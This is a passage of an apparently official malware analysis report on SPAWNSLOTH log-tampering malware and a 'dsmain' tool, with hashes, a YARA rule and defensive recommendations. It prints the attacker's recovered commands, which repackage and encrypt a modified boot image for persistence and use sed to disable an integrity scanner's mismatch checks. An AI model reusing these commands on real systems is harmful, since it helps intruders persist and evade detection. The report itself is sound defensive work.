   Copy ‘scanner-0.1-py3.6.egg’ into a ‘root’ directory. 
    
/bin/cp /lib/%s /home/root/lib/%s 
   Copy itself into the ‘root/lib’ directory. 
    
“” /tmp/coreboot_fs/bin/init 
   The boot process files being modified with the above commands. 
    
/bin/dsmain find . -print | /bin/dsmain cpio -o -H newc > /tmp/coreboot_fs/coreboot.img.1 
   Execute dsmain to repackage the modified ‘coreboot.img’. 
    
/bin/dsmain gzip /tmp/coreboot_fs/coreboot.img.1 
   Execute dsmain to compress the modified ‘coreboot.img’. 
    
/bin/dsmain -e /tmp/coreboot_fs/coreboot.img.1.gz /tmp/data/root/${kerndir}/coreboot.img $key 
   Execute dsmain to encrypt the modified ‘coreboot.img’. 
    
rm -rf /tmp/coreboot_fs’ 
   Delete the ‘/tmp/coreboot_fs’ directory. 

/tmp/installer/do-install-coreboot 
   The file being modified with the commands. 
—End Commands 2— 
—————————————————————————————— 
—Begin Commands 3— 
system(“sed -i ‘s/mismatchCount += 1/pass/g’ scripts/scanner.py”); 
   Replace the ‘mismatchCount += 1’ with ‘pass’ in ‘scanner.py’. 
    
system(“sed -i ‘s/mismatchedFiles.append(file)/ /g’ scripts/scanner.py”); 
   Replace the ‘mismatchedFiles.append(file)’ with a blank space in ‘scanner.py’. 
    
system(“sed -i ‘s/newFilesCount += 1/pass/g’ scripts/scanner.py”); 
   Replace ‘newFilesCount += 1’ with ‘pass’ in ‘scanner.py’. 
    
system(“sed -i ‘s/newFilesDetected.append(file)/ /g’ scripts/scanner.py”); 
   Replace ‘newFilesDetected.append(file)’ with a blank space in ‘scanner.py’. 
    
system(“sed -i ‘s/mismatchCount += 1/pass/g’ scripts/scanner_legacy.py”); 
   Replace the ‘mismatchCount += 1’ with ‘pass’ in ‘scanner_legacy.py’. 
    
system(“sed -i ‘s/mismatchedFiles.append(file)/ /g’ scripts/scanner_legacy.py”); 
   Replace the ‘mismatchedFiles.append(file)’ with a blank space in ‘scanner_legacy.py’. 
    
system(“sed -i ‘s/newFilesCount += 1/pass/g’ scripts/scanner_legacy.py”); 
   Replace ‘newFilesCount += 1’ with ‘pass’ in ‘scanner_legacy.py’. 
    
system(“sed -i ‘s/newFilesDetected.append(file)/ /g’ scripts/scanner_legacy.py”); 
   Replace ‘newFilesDetected.append(file)’ with a blank space in ‘scanner_legacy.py’. 
—End Commands 3—

Screenshots

Figure 1. – Checks if the file is loaded by a program called ‘web’ or ‘dsmdm’.

Figure 2. – The decoding function for the proxy.

Figure 3. – The modification to the hooked ‘strncpy’ function.

Figure 4 – Setting up the SSH shell.

Figure 5. – Loading a shared object ‘/tmp/.liblogblock.so’.

Figure 6. – Commands 1.

Figure 7. – Commands 2.

Figure 8. – Commands 3.

 

3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104
Tags

trojan

Details
Name liblogblock.so
Size 95092 bytes
Type ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
MD5 44d09ca5b989e24ff5276d5b5ee1d394
SHA1 5309f9082da0fc24ebf03cb1741fa71335224e5a
SHA256 3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104
SHA512 63ded8e7294ee9a0d4181310d25c348d0d657d35e57740234cb98c9abfd8eb18bb3cd35a28bca3013f3e141b41131b923b39717c7ae864019287c2d85a36ae63
ssdeep 1536:AxlL0im3r1G1+5uIEcfPTLuYzgrbwhpMTQe5pylmpsk76BAwu:Kt1+5unc3TLRujpyRzaw
Entropy 5.376198
Antivirus

No matches found.

YARA Rules
  • rule CISA_25993211_02 : SPAWNSLOTH trojan compromises_data_integrity
    {
    meta:
        author = “CISA Code & Media Analysis”
        incident = “25993211”
        date = “2025-03-04”
        last_modified = “20250304_0906”
        actor = “n/a”
        family = “SPAWN”
        capabilities = “compromises-data-integrity”
        malware_type = “trojan”
        tool_type = “unknown”
        description = “Detects SPAWNSLOTH malware samples”
        sha256_1 = “3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104”
    strings: 
        $s1 = “dslogserver”
        $s2 = “g_do_syslog_servers_exist”
        $s3 = “_ZN5DSLog4File3addEPKci”
        $s4 = “dlsym” 
       condition: 
        all of them
    }
     
ssdeep Matches

No matches found.

Relationships
3526af9189… Contained_Within 52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda
Description

The file, ‘liblogblock.so’, is a 32-bit Linux ELF binary identified as a variant of SPAWNSLOTH malware, a log tampering utility. 

If the program name is dslogserver, it detaches the shared memory containing the “g_do_syslog_servers_exist” IPC key. Next, it obtains the handle to the symbol “_ZN5DSLog4File3addEPKci” and calls ‘funchook_create’. Funchook is an open source tool that allows intercepting and modifying function calls at run time. The funchook_create calls funchook_alloc, which eventually calls mmap. 

The dissembled functions were renamed with the names in the opensource for readability. The TA had removed log messages in ‘funchook_create’ to make it difficult to identify the open source tool that was used.

Screenshots

Figure 9. – The hooking functions used against ‘dslogserver’.

b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d
Tags

trojan

Details
Name dsmain
Size 5102976 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.16, with debug_info, not stripped
MD5 6e01ef1367ea81994578526b3bd331d6
SHA1 09eb513f284771461bcdc16ee28d31ce8bbe74e0
SHA256 b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d
SHA512 ecbda91571b0429be42017dddd2cb687ce696dd601cd02f2502119b8b732376cee2097069ca35ba0089387d58213c6140c2caf8e6c2e05733d21c309b51e2b9b
ssdeep 49152:4ZLtRJ8ryYwd5OP5nz1kHKf26xZVKtom+YvFM4tAcRrhOBDKx76a:4ptVbQ5nz2SZstogttAcRrhOBu6a
Entropy 6.020899
Antivirus
ESET Linux/Agent.AHD trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

The file ‘dsmain’ is a 64-bit Linux ELF which contains the open source script ‘extract_vmlinux.sh’ and the open source tool ‘BusyBox’. 

The file takes three arguments (-e, -d, -g). The -e argument is used to encrypt a file with an Advance Encryption Standard (AES) key. The -d argument is used to decrypt a file using an AES key. The -g argument is used to invoke the script ‘extract_vmlinux.sh’ where it is written to /tmp/extract_vmlinux.sh and is used to extract the uncompressed vmlinux from a kernel image. The TA extracts vmlinux to analyze the kernel’s code, identify vulnerabilities and potentially exploit the system. 

BusyBox is an open-source project tool from a collection of Unix utilities that are widely used by embedded devices and industrial control systems (ICS). When a TA accesses a device running BusyBox, the TA can execute a series of BusyBox commands to perform various functions such as downloading and executing malicious payloads on the compromised device. The file ‘dsmain’ uses specified applets from BusyBox. 

–Begin Applets Used From BusyBox– 
bzcat 
bzip2 
cat 
cpio 
find 
gunzip 
gzip 
lzop 
sed 
sh 
strings 
tail 
tar 
touch 
tr 
unlzma 
unlzop 
unxz 
xxd 
xz 
–End Applets Used From BusyBox–

Relationship Summary

52bbc44eb4… Contains 3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104
3526af9189… Contained_Within 52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via the methods below:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

 Read More

CISA Releases One Industrial Control Systems Advisory

 ​CISA released one Industrial Control Systems (ICS) advisory on March 27, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

ICSA-25-037-01 Schneider Electric EcoStruxure Power Monitoring Expert (PME) (Update A)

CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations. 

CISA released one Industrial Control Systems (ICS) advisory on March 27, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.

CISA encourages users and administrators to review newly released ICS advisories for technical details and mitigations.

 Read More

Scroll to Top